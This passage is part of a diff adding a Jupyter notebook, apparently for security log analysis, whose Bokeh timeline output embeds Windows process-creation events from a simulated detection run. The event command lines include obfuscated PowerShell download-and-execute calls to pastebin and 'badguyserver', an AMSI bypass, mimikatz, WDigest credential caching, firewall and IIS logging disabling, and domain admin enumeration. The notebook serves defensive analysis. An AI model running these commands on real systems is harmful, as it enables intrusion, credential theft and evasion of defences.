delme.b64\\\"\",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> delme.b64\\\"\",\".\\\\powershell.exe  -c \\\"$a =\\n'Download'+'String'+\\\"(('ht'+'tp://paste'+\\n'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + '\\nNet.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\".\\\\powershell  -c {IEX (New-Object\\nNet.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f\\n':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17\\n','pqCw')));}\",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy\\nBYpa^sS i^mPOr^T-^M^oDuLE\\nbiTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^\\n'http://somedomain/best-kitten-names-1.jpg'\\n^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\\\nLocal\\\\Temp\\\\kittens1.jpg';\\\"\",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0\\nACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAc\\ngBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"certutil  -decode delme.b64 implant.exe\",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process;\\nInvoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\".\\\\powershell  -Noninteractive -Noprofile -Command\\n\\\"Invoke-Expression Get-Process; Invoke-WebRequest\\n-Uri http://badguyserver/pwnme\\\"\",\".\\\\powershell  Invoke-Shellcode.ps1\",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\".\\\\powershell  -command \\\"(New-Object\\nNet.WebClient).DownloadString(('ht'+'tp://pasteb'\\n+ 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"net  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x1 /f\",\".\\\\reg  add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:Cre\\nateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe\\n-c \\\"\\\"$x=$((gp\\nHKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\nCertificate).Certificate);.\\\\powershell -E\\n$y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule\\nname=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\app\\ndata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityprovi\\nders\\\\wdigest uselogoncredential /t 1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\")\",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype\\n('http://system.management.automation.amsiutils').\\ngetfield('amsiinitfailed','nonpublic,static').setv\\nalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 trac\\nefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzz\\nzz.txt\",\".\\\\wuauclt.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\".\\\\lsass.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"cmd  /c \\\"powershell wscript.shell used to download\\na .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t\\n/g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\sys\\ntem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set\\nopmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com\\nabc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\n\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/\",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTIC\\nA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test\\nService\\\"\",\"sc  delete MSTICTestService\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition\\n/t reg_dword /d 33554556 /f\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"cmd.exe /c\\nc:\\\\Diagnostics\\\\WindowsSimulateDetections.bat\\nc:\\\\Diagnostics\\\\UserTmp\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688],\"NewProcessName\":[\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.ex\\ne\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"ANBV9v6EdkIAcHT2/oR2QgBQe/b+hHZCAEB/9v6EdkIAAIP2/oR2QgDghPb+hHZCAECJ9v6EdkIA4In2/oR2QgAwjfb+hHZCAFCQ9v6EdkIAcJP2/oR2QgBQlPb+hHZCAACX9v6EdkIA8Jn2/oR2QgBwnPb+hHZCACCf9v6EdkIA0KH2/oR2QgBwpvb+hHZCAMCp9v6EdkIAUK32/oR2QgBwsPb+hHZCABCx9v6EdkIAEEHz/oR2QgDwTPP+hHZCAJBN8/6EdkIA4FXz/oR2QgDwXPP+hHZCAGBx8/6EdkIAMKP0/oR2QgCwHPX+hHZCADAf9f6EdkIAECL1/oR2QgDAQfX+hHZCAFBL9f6EdkIAEFP1/oR2QgDAtPX+hHZCAEC89f6EdkIAkMP1/oR2QgDQyvX+hHZCAPDR9f6EdkIAMNn1/oR2QgAQ4PX+hHZCAHBh9f6EdkIAsGz1/oR2QgAwcPX+hHZCADB09f6EdkIAsHf1/oR2QgCQiPX+hHZCABCQ9f6EdkIA4Jn1/oR2QgDwpPX+hHZCAIA19v6EdkIAEDr2/oR2QgAwPfb+hHZCAFA/9v6EdkIAAEf2/oR2QgCwSfb+hHZCAABM9v6EdkIAEE72/oR2QgAgT/b+hHZCAEBS9v6EdkIA8Fj2/oR2QgAQXPb+hHZCADBf9v6EdkIAgGL2/oR2QgAwZfb+hHZCAOBm9v6EdkIAQGv2/oR2QgAwbvb+hHZCAFBx9v6EdkIAQLb2/oR2QgAwv/b+hHZCACDC9v6EdkIAEMX2/oR2QgBQx/b+hHZCAADJ9v6EdkIAIMz2/oR2QgDAzPb+hHZCACDR9v6EdkIAAOz2/oR2QgDw+Pb+hHZCABD89v6EdkIAMAD3/oR2QgAgA/f+hHZCAEAG9/6EdkIAMAn3/oR2QgCQCff+hHZCAGAO9/6EdkIA4BD3/oR2QgAwE/f+hHZCACAX9/6EdkIAQBr3/oR2QgAwHff+hHZCAFAg9/6EdkIAcCP3/oR2QgAgJvf+hHZCAEAp9/6EdkIAcC33/oR2QgDAMPf+hHZCAHAz9/6EdkIAkDr3/oR2QgCwPvf+hHZCAHBB9/6EdkIAIET3/oR2QgAQR/f+hHZCAPBJ9/6EdkIAEEz3/oR2QgAQ7/X+hHZCAND29f6EdkIAUP/1/oR2QgDQC/b+hHZCADAQ9v6EdkIAUBP2/oR2QgBQGPb+hHZCACAd9v6EdkIAcEDz/oR2QgDQsfX+hHZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[117]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1996\"},\"selection_policy\":{\"id\":\"1997\"}},\"id\":\"1918\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1973\",\"type\":\"Circle\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"CommandLine\",\"@CommandLine\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"EventID\",\"@EventID\"]]},\"id\":\"1919\",\"type\":\"HoverTool\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1943\",\"type\":\"PanTool\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2001\",\"type\":\"DaysTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2011\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1998\"},{\"id\":\"1999\"},{\"id\":\"2000\"},{\"id\":\"2001\"},{\"id\":\"2002\"},{\"id\":\"2003\"},{\"id\":\"2004\"},{\"id\":\"2005\"},{\"id\":\"2006\"},{\"id\":\"2007\"},{\"id\":\"2008\"},{\"id\":\"2009\"}]},\"id\":\"1932\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2000\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2013\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2014\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1927\",\"type\":\"LinearScale\"}],\"root_ids\":[\"1988\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"c1ea0993-3441-4050-b8a6-911e85003b63\",\"root_ids\":[\"1988\"],\"roots\":{\"1988\":\"fef2aee8-6a1f-448d-8c76-d6f0f8ff6c34\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1988"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Column(id='1988', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'1988', <span id=\"2194\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='1920', ...), Figure(id='1952', ...)],</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"2193\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2194\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2193\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 12
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 13,
+   "source": [
+    "nbdisplay.display_timeline(data=clus_logons, group_by=\"Account\",\n",
+    "                           source_columns=['Account', 'LogonType'],\n",
+    "                           title='Clustered Host Logons',\n",
+    "                           legend=\"right\",\n",
+    "                           yaxis=True)"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2195\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function 